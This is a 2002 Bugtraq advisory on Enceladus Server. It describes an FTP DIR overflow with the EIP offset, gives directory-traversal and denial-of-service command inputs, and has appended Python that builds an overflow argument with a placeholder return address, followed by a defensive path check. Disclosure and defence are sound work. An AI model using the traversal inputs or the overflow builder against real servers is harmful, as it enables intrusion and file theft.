Multiple vulnerabilities in Enceladus Server

From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Date: Thu, 19 Dec 2002 15:24:58 GMT+1

Hi,

Enceladus Server Suite is a lightweight Internet/Intranet web and FTP server
for Windows. According to Mollensoft, version 3.9 "Includes a fix to the
directory traversal vulnerability... (This is a CRITICAL SECURITY UPDATE)"
http://www.mollensoft.com/

I found several critical vulnerabilities in this server.

1 - Buffer overflow and remote code execution

Tamer reported that the server crashed with a "long sequence of characters
as an argument to "CD" command" (http://online.securityfocus.com/archive/1/302596).
I believe he missed a real buffer overflow, because that crash only
overwrites ESP and so allows nothing more than a simple DoS attack:

50e091e3 803820 cmp byte ptr [eax],0x20
(ftpservx.dll)

With the "DIR" argument we can overwrite EIP:
dir + [buffer = 279 bytes] >> EIP is overwritten at bytes 42, 43, 44, 45,
which is sufficient to inject shellcode.

The state of the registers is:

Access violation - code c0000005 (first chance)
eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5 esi=0012bce0 edi=0019affd
eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
61616161 ?? ???

Note that EIP is at the beginning of our buffer:
ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[EIP=4BYTE]
aaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

The "mget" argument also gives the same result.
The exploit is easy to write, since EBX points to our buffer:
0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2 - Directory traversal

ftp> cd ..
access denied
ftp> cd @/....\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 User Group    0 Dec 18 12:59 anonymous-ftp
drwxr-xr-x 1 User Group    0 Dec 18 12:59 downloads
-rwxr-xr-x 1 User Group 8544 Mar 18 02:09 emailme.html
-rwxr-xr-x 1 User Group  878 Mar 16 04:52 execupload.html
-rwxr-xr-x 1 User Group 1033 Oct 27 02:22 exitstatus.html
-rwxr-xr-x 1 User Group 5965 Mar 18 02:12 fileuplogin.html
drwxr-xr-x 1 User Group    0 Dec 18 12:59 ftproot
drwxr-xr-x 1 User Group    0 Dec 18 12:59 images
-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
-rwxr-xr-x 1 User Group 1299 Mar 18 23:41 mailexitstatus.html
-rwxr-xr-x 1 User Group 4402 Mar 18 02:09 MyPictures.html
drwxr-xr-x 1 User Group    0 Dec 18 12:59 secure-downloads
-rwxr-xr-x 1 User Group 5082 Mar 18 02:09 signguestbook.html
-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
ftp> cd @@@@@@@@@@@/..c:\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> pwd
257 "c:/" is current directory.
ftp> dir

[NO COMMENT]

3 - Denial of service and CPU consumption

ftp> cd @/..@/..
(no response)
cpu 99% used

securma massine
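As an added example, not part of the original post and not code from Enceladus or Mollensoft, the following Python shows the offset-finding step behind the overflow described above. A buffer of all 'a' gives eip=61616161, which cannot say which four bytes of the 279-byte DIR argument landed in the saved return address; a cyclic pattern of the kind Metasploit's pattern_create emits makes the crashed EIP value identify the offset directly. The same helpers then lay out a DIR argument of the reported length with a placeholder return address at the reported offset 42. The return address 0xDEADBEEF, the filler bytes and the total length are assumptions for illustration; the space byte is treated as forbidden on the inference that the "cmp byte ptr [eax],0x20" fragment quoted above is the argument delimiter, which the post does not confirm. Sending the line over the control connection after login is left to the reader.

```python
import string
import struct

# Alphabet of Metasploit-style cyclic patterns: Aa0Aa1Aa2... Every 4-byte
# window is unique for the first 20280 bytes, after which the sequence repeats.
MAX_PATTERN = 26 * 26 * 10 * 3

# Bytes that cannot appear in an FTP command argument: CR/LF end the line and
# NUL ends a C string.  0x20 is added on the inference (assumption, not
# verified against the server) that the "cmp byte ptr [eax],0x20" fragment in
# the post is the argument delimiter.
BAD_BYTES = b"\x00\x0a\x0d\x20"


def pattern_create(length):
    """Return `length` characters of the non-repeating pattern."""
    if not 0 <= length <= MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_PATTERN)
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value):
    """Offset of a crashed register value in the pattern, or None if the value
    is not a pattern window.  `value` is the register as an int (x86 is
    little-endian, so the bytes are reversed) or as the 4 bytes/chars seen."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    elif isinstance(value, bytes):
        needle = value.decode("latin-1")
    else:
        needle = value
    idx = pattern_create(MAX_PATTERN).find(needle)
    return None if idx < 0 else idx


def build_dir_argument(offset, ret_addr, total_len):
    """Filler up to the saved return address, the address little-endian, then
    padding out to the total length the post reports as crashing (279 bytes)."""
    if offset + 4 > total_len:
        raise ValueError("total_len too short to hold the return address")
    arg = b"A" * offset + struct.pack("<I", ret_addr)
    return arg + b"C" * (total_len - len(arg))


def build_ftp_command(verb, argument):
    """One FTP control-channel line, refusing arguments that would be cut short."""
    bad = [b for b in argument if b in BAD_BYTES]
    if bad:
        raise ValueError("argument contains bad bytes: %r" % bytes(sorted(set(bad))))
    return verb.encode("ascii") + b" " + argument + b"\r\n"


if __name__ == "__main__":
    # Step 1: send a 279-byte pattern instead of 'a' * 279 and read EIP from the crash.
    print(build_ftp_command("DIR", pattern_create(279).encode("ascii")))
    # An all-'a' buffer gives eip=61616161, which pins down nothing...
    print(pattern_offset(0x61616161))        # None
    # ...whereas a pattern value such as eip=33614132 ("2Aa3") gives the offset.
    print(pattern_offset(0x33614132))        # 8
    # Step 2: place a placeholder return address (assumed, not a real one) at
    # the offset the post reports (byte 42) inside a 279-byte DIR argument.
    print(build_dir_argument(42, 0xDEADBEEF, 279)[40:48])
```

The offset check also explains why the post can only say "42, 43, 44, 45" by trial: with a uniform buffer the crash value carries no position information, so the offset has to be found by varying the buffer, which the pattern does in a single request.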

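As an added example, not the server's own code, the following Python shows the server-side check that rejects both CWD arguments from the traversal section above. Instead of refusing the literal string "..", it canonicalises the requested path against the FTP root under Windows path rules (ntpath, so it runs on any platform) and then refuses anything that resolves outside the root, carries a drive letter or UNC prefix, or contains a component that Win32 rewrites before opening it: dot-only names such as "....", trailing dots or spaces, ':' (a drive or NTFS alternate data stream) and the other reserved characters. The root C:\ftproot is an assumed layout; the directory names come from the post's listing. The lexical normalisation here is the rule set a fixed server would apply and does not reproduce the original server's behaviour.

```python
import ntpath
import re

# Assumed layout for the example: the FTP root of an Enceladus-style server on
# a Windows host.  Directory names below come from the post's listing.
FTP_ROOT = r"C:\ftproot"

# Characters Win32 refuses in a file-name component, plus ':' which would
# otherwise name a drive or an NTFS alternate data stream.
_RESERVED = re.compile(r'[<>:"|?*\x00-\x1f]')


def _suspicious_component(part):
    """Components that Win32 path handling rewrites before opening them.
    '.' and '..' never reach here because normpath has already consumed them."""
    if part == "" or set(part) <= {"."}:
        return True            # dot-only names such as '....'
    if part[-1] in ". ":
        return True            # Win32 silently strips trailing dots and spaces
    return bool(_RESERVED.search(part))


def resolve_cwd(root, cwd, requested):
    """Return the absolute directory a CWD argument resolves to, or None if it
    must be refused.  `cwd` is the client's current directory (absolute, inside
    root); `requested` is the raw argument as sent by the client."""
    root = ntpath.normpath(root)
    arg = requested.replace("/", "\\")
    # A leading separator is relative to the FTP root, never to the drive root.
    base = root if arg.startswith("\\") else cwd
    arg = arg.lstrip("\\")
    # A drive letter or UNC prefix in the argument is an escape attempt by itself.
    drive, tail = ntpath.splitdrive(arg)
    if drive:
        return None
    # Canonicalise first, then compare: '..' is resolved here, so no denylist
    # of the string '..' is needed and disguised forms of it cannot slip past.
    candidate = ntpath.normpath(ntpath.join(base, tail))
    inside = (candidate.lower() == root.lower()
              or candidate.lower().startswith(root.lower() + "\\"))  # NTFS is case-insensitive
    if not inside:
        return None
    relative = candidate[len(root):].lstrip("\\")
    for part in relative.split("\\") if relative else []:
        if _suspicious_component(part):
            return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: the two traversal arguments and the DoS argument
    # from the post, plus ordinary ones a client would send.
    for cwd, req in [(FTP_ROOT, ".."),
                     (FTP_ROOT, "@/....\\"),
                     (FTP_ROOT, "@@@@@@@@@@@/..c:\\"),
                     (FTP_ROOT, "@/..@/.."),
                     (FTP_ROOT, "downloads"),
                     (ntpath.join(FTP_ROOT, "downloads"), "/images"),
                     (ntpath.join(FTP_ROOT, "downloads"), "..\\..\\windows")]:
        print("%-24r -> %s" % (req, resolve_cwd(FTP_ROOT, cwd, req) or "550 refused"))
```

The "@/..@/.." argument from the denial-of-service section resolves lexically to the "@" subdirectory in a single pass; whether that directory exists is then the filesystem's decision, and nothing in the check loops over the input more than once. On a live server the final containment test should be repeated on the path the OS actually opens (for instance after os.path.realpath) so that junctions and symbolic links cannot point back out of the root.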
